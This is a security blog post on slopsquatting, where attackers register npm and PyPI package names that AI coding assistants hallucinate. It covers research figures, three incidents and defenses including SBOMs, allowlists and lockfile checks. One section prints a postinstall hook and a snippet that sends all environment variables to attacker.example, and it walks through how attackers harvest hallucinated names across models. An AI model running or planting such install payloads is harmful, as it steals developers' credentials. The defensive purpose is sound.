DuckDuckGo’s AI assistant recently informed users that Donald Trump had died of rabies. The internet laughed. DuckDuckGo apologized. Nobody was harmed.
That’s the harmless version of AI hallucination — a chatbot confidently stating something absurd about a public figure. But AI models hallucinate in other contexts too, and some of those contexts are a lot less funny. When an AI coding assistant invents a package name inside your terminal, and an attacker has already registered that name on npm with a credential-stealing payload baked into the install script, the hallucination isn’t a punchline. It’s a breach.
This attack has a name: slopsquatting. And it’s not theoretical — it has already racked up tens of thousands of installs across multiple documented cases.
TL;DR
- AI coding assistants regularly suggest package names that don’t exist — roughly 20% of AI-generated package recommendations are hallucinated
- Attackers register these hallucinated names on npm and PyPI with malicious payloads
- Real incidents: unused-imports, huggingface-cli, and react-codeshift have collectively reached tens of thousands of installs
- AI agents that autonomously install packages make this dramatically worse — no human reviews the suggestion
- Defense requires SBOM generation, dependency allowlists, and verified package signatures — not just scanning for typos
Why This Is Different From Typosquatting
You’re probably familiar with typosquatting: an attacker registers reqeusts hoping someone mistyped requests. The attack relies on human error — a slip of the finger.
Slopsquatting is different in a critical way. The “error” isn’t made by a human. It’s made by the AI assistant the developer has learned to trust.
When you ask GitHub Copilot, ChatGPT, or Claude to help you write code, the model draws on patterns from its training data. Sometimes it generates a package name that sounds plausible, follows naming conventions, and fits the context — but simply doesn’t exist. The model isn’t lying. It’s doing what it was trained to do: predict the most likely next token. It just happens to be wrong.
The term was coined by Python Software Foundation Developer-in-Residence Seth Larson, combining “slop” (low-quality AI output) with “squatting” (the practice of claiming a name someone else will need).
The Scale of the Problem
Researchers from the University of Texas at San Antonio, the University of Oklahoma, and Virginia Tech presented a landmark study at USENIX Security 2025. They generated 2.23 million code samples across 16 different LLMs and analyzed every package reference.
The findings were stark:
| Metric | Result |
|---|---|
| Average hallucination rate across all models | ~19.7% |
| Commercial models (GPT-4 Turbo, etc.) | 5.2% hallucination rate |
| Open-source models | up to 21.7% hallucination rate |
| CodeLlama family | exceeded 33% in some configurations |
| Hallucinations that were pure fabrications | 51% |
| Hallucinations that conflated two real packages | 38% |
| Hallucinations that were typo variants | 13% |
A one-in-five chance that any given AI package suggestion doesn’t exist is not a fringe edge case. At typical developer velocity — dozens of AI-assisted code suggestions per day — these odds add up fast.
There’s another wrinkle: 8.7% of hallucinated Python package names matched existing JavaScript packages on npm, and vice versa. A name that the AI keeps inventing for Python developers may exist harmlessly on npm, which makes it look plausible, while the same name sits unclaimed on PyPI for an attacker to register.
How the Attack Works
The mechanics are simple, which is part of what makes slopsquatting so dangerous.
Step 1 — Harvest hallucinations. An attacker queries multiple LLMs with common development tasks: “set up ESLint for a TypeScript project,” “parse CSV in Python,” “connect to Redis in Node.js.” They record every package name the models suggest and filter for names that don’t actually exist in the target registry.
Step 2 — Identify high-frequency hallucinations. Some names appear repeatedly across different models and different queries. These are high-value targets — the more consistently an AI invents a name, the more likely a developer will follow the recommendation.
Step 3 — Register and arm the package. The attacker publishes a package with the hallucinated name. The package may contain a post-install script that executes immediately on npm install or pip install. Common payloads:
- Stealing environment variables (API keys, cloud tokens, database credentials)
- Exfiltrating ~/.npmrc, ~/.ssh/, or ~/.aws/credentials
- Downloading a secondary payload from an external URL to evade static analysis
Step 4 — Wait. The attacker doesn’t need to phish anyone. Every developer who follows their AI assistant’s advice and runs npm install <hallucinated-name> becomes a victim automatically.
Real Incidents
These aren’t hypotheticals.
unused-imports
The legitimate package for this functionality is eslint-plugin-unused-imports. LLMs consistently hallucinate a shorter version: unused-imports. An attacker registered this name on npm with a malicious payload. As of early 2026, the package was still recording approximately 233 weekly downloads despite npm marking it as security-held. Developers weren’t even searching for it — their AI assistants were directing them straight to it.
huggingface-cli
The correct way to install Hugging Face’s CLI tooling is pip install -U "huggingface_hub[cli]". LLMs consistently hallucinate a shorter alternative: huggingface-cli. In 2024, Bar Lanyado of Lasso Security uploaded an empty package under that name to PyPI purely as a proof of concept — no malicious payload. The result: more than 30,000 authentic downloads in three months. Among those who had copy-pasted the hallucinated install command was Alibaba, who had included it in a public repository README. The package itself was benign; the real lesson is the scale of exposure a weaponized version would have had.
react-codeshift
In January 2026, Aikido Security researcher Charlie Eriksen discovered an npm package called react-codeshift — a plausible-sounding conflation of two real tools, jscodeshift and react-codemod, but a name that doesn’t actually exist. The hallucination traced back to a single commit of 47 AI-generated agent skill files where no human had reviewed the output. Before Eriksen defensively claimed the name himself, the package reference had propagated to 237 repositories through forks, been translated into Japanese, and was still receiving daily download attempts from autonomous agents. No malicious payload was ever deployed — but the name sat unclaimed long enough for anyone to arm it.
How Attackers Map the Attack Surface
The attacker’s workflow is more systematic than it might appear. Hallucinated package names aren’t random — they follow predictable patterns tied to how LLMs were trained. An attacker who understands this can build a high-confidence target list in hours.
Query engineering. The attacker crafts prompts that maximize package-name generation: “write a Node.js function that parses Markdown with syntax highlighting,” “set up a Python FastAPI project with JWT auth and rate limiting.” Vague, common tasks produce the most hallucinations.
Cross-model comparison. A name hallucinated by only one model is a low-value target. A name hallucinated consistently across GPT-4, Claude, Gemini, and Mistral is high-value — it means the training data of multiple models independently converged on the same false memory, and many more developers will encounter it.
Registry gap analysis. The attacker checks each harvested name against npm and PyPI. Names that don’t exist become candidates. Names that exist but have suspiciously low download counts may already be squatted by another attacker — or may be unclaimed.
Payload selection. The most common payloads in documented slopsquatting cases are post-install scripts that execute immediately. A typical skeleton in package.json:
```json
{
  "name": "unused-imports",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "node ./install.js"
  }
}
```
And in install.js:
```javascript
const https = require('https');
const { execSync } = require('child_process');

// Exfiltrate environment variables to attacker-controlled server
const data = JSON.stringify({ env: process.env });
https.request({ host: 'attacker.example', path: '/collect', method: 'POST' }, () => {}).end(data);
```
This runs silently during npm install. No user prompt, no warning, no indication in the terminal beyond the normal install output.
The Autonomous Agent Problem
If a human developer follows bad advice, the damage is limited to their machine and their project. But increasingly, developers aren’t the ones running npm install — their AI coding agents are.
Agentic tools like Cursor, Claude Code, and various AI IDEs can autonomously read a task description, generate code, install dependencies, and run tests — without a human reviewing each step. When an AI agent hallucinates a package name and autonomously installs it, the attack completes with zero human interaction.
This transforms slopsquatting from a social engineering problem (“trick the developer into doing something wrong”) into a fully automated supply chain attack. The attacker registers the package and waits. The AI does the rest.
The react-codeshift case illustrates this perfectly: the hallucinated name originated in a batch of AI-generated agent skill files, spread through 237 repository forks, and continued accumulating download attempts from autonomous agents — each one faithfully following the infected instructions without a human ever reviewing them.
Why Detection Is Hard
Static scanners don’t catch it before install. A package named unused-imports doesn’t look suspicious. It follows naming conventions, it’s not a misspelling of anything obvious, and it appears in the registry. Traditional typosquatting detectors look for edit-distance matches against known packages — slopsquatted names often pass that check cleanly.
Post-install scripts are trusted by default. Both npm and pip allow packages to run arbitrary code at install time. Most developers never examine these scripts.
The malicious package looks legitimate. Attackers craft a README, add fake stars via bot networks, and sometimes include partial functional code so the package actually does something useful. A developer who installs unused-imports might see it import without error and assume everything is fine — while their credentials are already being exfiltrated in the background.
LLMs don’t self-correct. If you ask the same model that hallucinated the package name “does unused-imports exist on npm?”, it may confidently confirm that it does. The hallucination is self-consistent.
What You Can Do Now
For developers
Verify before you install. Before running any npm install or pip install from an AI suggestion, spend 10 seconds checking the package registry. Look at: creation date, download count, publisher identity, and whether the README links to a real GitHub repository.
Pin exact versions. Lock your dependency tree with a lockfile (package-lock.json, poetry.lock). This doesn’t prevent the initial compromise but limits drift and makes audits easier.
Audit your AI assistant’s suggestions. Treat package names from AI the same way you’d treat a link in a phishing email — verify before you click.
For teams and organizations
Generate an SBOM. A Software Bill of Materials gives you a complete inventory of every package in your project. Tools like syft, cyclonedx-npm, and pip-audit can generate one automatically. You can’t detect unauthorized additions if you don’t know what’s supposed to be there.
Use dependency allowlists. Define which package registries your CI/CD pipeline is allowed to pull from, and configure your package manager to reject anything outside that list. In npm: .npmrc with registry= scoped to a private mirror. In pip: --index-url and --extra-index-url restrictions.
Scan for hallucination-prone names. Tools like Aikido SafeChain and Snyk are adding slopsquatting-specific detection — flagging packages with suspiciously recent creation dates, minimal download history, and names that match common LLM hallucination patterns.
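The checks just described, as an added example that is not code from the original post or from any of the tools it names: it scores constructed registry metadata for the signals listed under “Verify before you install” (creation date, download count, publisher, repository link) and flags names that are a fragment or fusion of real package names, the conflation pattern seen in unused-imports and react-codeshift. Field names follow the shape of npm registry JSON, but the sample values and the thresholds are assumptions.

```python
"""Score registry metadata for the slopsquatting signals the post lists.

Added example, not code from the original post or from any vendor tool.
Applies the manual checks (creation date, downloads, repository link) plus
the naming pattern the post describes: a fragment or fusion of real names.
"""
from datetime import datetime, timezone

# Constructed sample in the shape of registry.npmjs.org JSON; "weekly_downloads"
# stands in for the separate downloads API, "maintainers" is the publisher.
SAMPLE_META = {
    "name": "unused-imports",
    "time": {"created": "2025-11-02T00:00:00.000Z"},
    "maintainers": [{"name": "fresh-account"}],
    "repository": None,
    "weekly_downloads": 233,
}
KNOWN_PACKAGES = {"eslint-plugin-unused-imports", "jscodeshift", "react-codemod"}
SAMPLE_NOW = datetime(2026, 2, 1, tzinfo=timezone.utc)   # fixed "today" for the sample


def looks_like_conflation(name, known, min_part=4):
    """True if name is a fragment of a real name or fuses two real names."""
    if name in known:
        return False
    if any(name in k for k in known):   # unused-imports inside eslint-plugin-unused-imports
        return True
    for i in range(min_part, len(name) - min_part + 1):
        heads = {k for k in known if k.startswith(name[:i])}
        tails = {k for k in known if k.endswith(name[i:])}
        if any(h != t for h in heads for t in tails):   # react-codemod + jscodeshift
            return True
    return False


def slopsquat_signals(meta, known, now, max_age_days=180, min_weekly=1000):
    """Return warning strings; an empty list means none of the signals fired."""
    created = datetime.strptime(meta["time"]["created"], "%Y-%m-%dT%H:%M:%S.%fZ")
    age = (now - created.replace(tzinfo=timezone.utc)).days
    signals = []
    if age < max_age_days:
        signals.append(f"created only {age} days ago")
    if meta["weekly_downloads"] < min_weekly:
        signals.append(f"only {meta['weekly_downloads']} weekly downloads")
    if not meta.get("repository"):
        signals.append("no repository link in metadata")
    if looks_like_conflation(meta["name"], known):
        signals.append("name looks like a fragment or fusion of real packages")
    return signals
```

The thresholds are deliberately loose; the point is to surface a package for a human look before install, not to block it automatically.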
Restrict autonomous agent permissions. If your AI coding agent can install packages, treat that capability as a privileged operation. Require human approval before any new dependency is added to the lockfile. Most agentic IDEs support approval workflows for tool use.
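One way to enforce the allowlist and the “human approval before a new dependency lands in the lockfile” rule from the two items above, as an added example that is not the post’s own CI step or any tool’s code: it diffs a reviewed baseline package-lock.json against the current one and reports every new package that is off the allowlist, resolves outside the approved registry, or declares an install script. The two lockfiles are constructed, minimal lockfile v3 documents; the allowlist and registry values are assumptions.

```python
"""Fail the build when a lockfile gained a dependency nobody reviewed.

Added example, not the post's own CI step: compares a reviewed baseline
lockfile with the current one and enforces the allowlist and registry
restrictions. Both lockfiles are constructed package-lock v3 documents.
"""
import json

APPROVED_REGISTRY = "https://registry.npmjs.org/"
ALLOWLIST = {"eslint-plugin-unused-imports"}   # names a human has already reviewed
BASELINE_LOCK = json.dumps({"lockfileVersion": 3, "packages": {
    "": {"dependencies": {"eslint-plugin-unused-imports": "^3.0.0"}},
    "node_modules/eslint-plugin-unused-imports": {
        "version": "3.2.0",
        "resolved": APPROVED_REGISTRY + "eslint-plugin-unused-imports/-/eslint-plugin-unused-imports-3.2.0.tgz",
    },
}})
# Same tree after an agent ran `npm install unused-imports` (the hallucinated name)
_after = json.loads(BASELINE_LOCK)
_after["packages"]["node_modules/unused-imports"] = {
    "version": "1.0.0",
    "resolved": APPROVED_REGISTRY + "unused-imports/-/unused-imports-1.0.0.tgz",
    "hasInstallScript": True,   # npm sets this when the package declares install hooks
}
CURRENT_LOCK = json.dumps(_after)


def installed_packages(lock_text):
    """Map package name -> lock entry for every node_modules path (lockfile v2/v3)."""
    packages = json.loads(lock_text).get("packages", {})
    return {path.split("node_modules/")[-1]: meta   # handles nested and @scoped paths
            for path, meta in packages.items() if path}   # "" is the root project


def unreviewed_additions(baseline_text, current_text, allowlist, registry):
    """Return (name, reasons) for packages new since the baseline that are off the
    allowlist, resolve outside the approved registry, or run an install script."""
    before = installed_packages(baseline_text)
    findings = []
    for name, meta in installed_packages(current_text).items():
        if name in before:
            continue   # already reviewed with the baseline
        reasons = []
        if name not in allowlist:
            reasons.append("not on allowlist")
        if not meta.get("resolved", "").startswith(registry):
            reasons.append("resolved outside approved registry")
        if meta.get("hasInstallScript"):
            reasons.append("declares an install script")
        if reasons:
            findings.append((name, reasons))
    return findings
```

A CI job would exit non-zero whenever the returned list is non-empty and print the reasons so the reviewer sees why the agent’s install was rejected.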
Verify cryptographic signatures. npm supports package provenance attestations (via npm audit signatures). PyPI is rolling out Sigstore-based signatures. Use them.
Practical audit commands
A few commands you can run right now to assess your exposure:
```shell
# npm: check for packages with no provenance attestation
npm audit signatures

# npm: list the names of all direct dependencies
npm list --depth=0 --json | jq '.dependencies | keys[]'

# pip: check installed packages against known vulnerability advisories
pip-audit

# Snyk: scan for supply chain anomalies including slopsquatting signals
snyk test --all-projects

# Generate an SBOM with syft (install: https://github.com/anchore/syft)
syft . -o cyclonedx-json > sbom.json
```
For CI/CD pipelines, add a step that compares the post-install lockfile against a known-good baseline and fails the build on any new unreviewed addition:
```yaml
# GitHub Actions example
- name: Verify lockfile integrity
  run: |
    git diff --exit-code package-lock.json || \
      (echo "Lockfile changed without review" && exit 1)
```
The Broader Pattern
Slopsquatting is a symptom of a shift in how software gets written. When AI assistants became fast and capable enough to generate working code on the first try, developers stopped reading every line they paste. When AI agents became capable enough to act autonomously, developers stopped seeing every action taken.
The trust that makes AI assistants useful is exactly what makes them exploitable. Attackers don’t need to compromise the AI model itself — they just need to understand its failure modes and position themselves to profit from them.
The DuckDuckGo / rabies story is funny because the hallucination was harmless. In software supply chains, the hallucination lands in your package.json, runs at install time, and exfiltrates your AWS credentials before you finish your coffee.
Related Posts
- Detecting Typosquatting Packages — The predecessor attack that slopsquatting extends and amplifies
- GitHub Actions Supply Chain Attack: Shai Hulud — How supply chain attacks propagate through CI/CD pipelines
- HuggingFace AI Supply Chain Attacks 2026 — AI platform as an attack surface
- Miasma / Mini Shai Hulud: AI Agent Supply Chain — AI agents as supply chain attack vectors
- CI/CD Pipeline Attacks: Detect 2026 — Defending the build pipeline
Sources
- CSA Research Note: Slopsquatting — AI Supply Chain — Cloud Security Alliance, April 2026
- Slopsquatting: The AI Package Hallucination Attack Already Happening — Aikido Security
- Slopsquatting: New AI Hallucination Threats & Mitigation Strategies — Snyk
- Slopsquatting Attacks: How AI Phantom Dependencies Create Security Risks — Contrast Security
- AI-Induced Supply-Chain Compromise: A Systematic Review — ResearchGate / USENIX Security 2025
- The Hallucinated Package Attack: Slopsquatting Explained — Mend.io
- AI-Hallucinated Dependencies in PyPI and npm — Rescana